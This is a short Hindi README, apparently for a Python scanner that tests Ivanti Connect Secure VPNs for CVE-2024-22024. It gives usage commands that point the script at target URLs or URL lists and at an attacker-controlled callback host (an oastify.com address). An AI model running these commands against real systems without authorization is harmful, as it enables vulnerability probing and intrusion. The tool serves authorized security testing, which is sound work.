
Ivanti Connect Secure में CVE-2024-22024 कमजोरी की जाँच करें
Ivanti Connect Secure में CVE-2024-22024 भेद्यता की जाँच करें
[!WARNING] केवल शैक्षिक उद्देश्य और अधिकृत परीक्षण के लिए।
-u या --target_url: लक्ष्य Ivanti Connect Secure (ICS) URL या URL सूची वाली फ़ाइल।
-c या --attacker_url: हमलावर URL (Burp Collaborator, ngrok, या Webhook.site से एक अद्वितीय URL का उपयोग करके उत्पन्न करें)
-t या --timeout: अनुरोध के लिए सेकंड में टाइमआउट (डिफ़ॉल्ट 3 सेकंड है)
एकल URL का परीक्षण:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
URL सूची का परीक्षण:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
अलग टाइमआउट (5 सेकंड) का उपयोग करना:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
जिसने भी भेद्यता की खोज की .. मैंने केवल PoC पढ़ा और इसे स्वचालित किया।